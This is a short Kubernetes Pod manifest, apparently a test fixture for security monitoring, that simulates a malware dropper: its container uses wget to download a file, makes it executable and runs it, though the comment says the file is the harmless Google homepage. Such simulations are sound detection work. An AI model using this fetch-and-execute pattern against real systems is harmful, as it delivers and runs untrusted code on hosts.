apiVersion: v1
kind: Pod
metadata:
  name: malware-dropper-v2
spec:
  containers:
  - name: dropper-container
    image: busybox
    # Downloads a harmless file from a real site, renames it to something suspicious, and tries to execute it
    command: ['sh', '-c', 'wget -O /tmp/sys_update http://www.google.com && chmod +x /tmp/sys_update && /tmp/sys_update || sleep 3600']
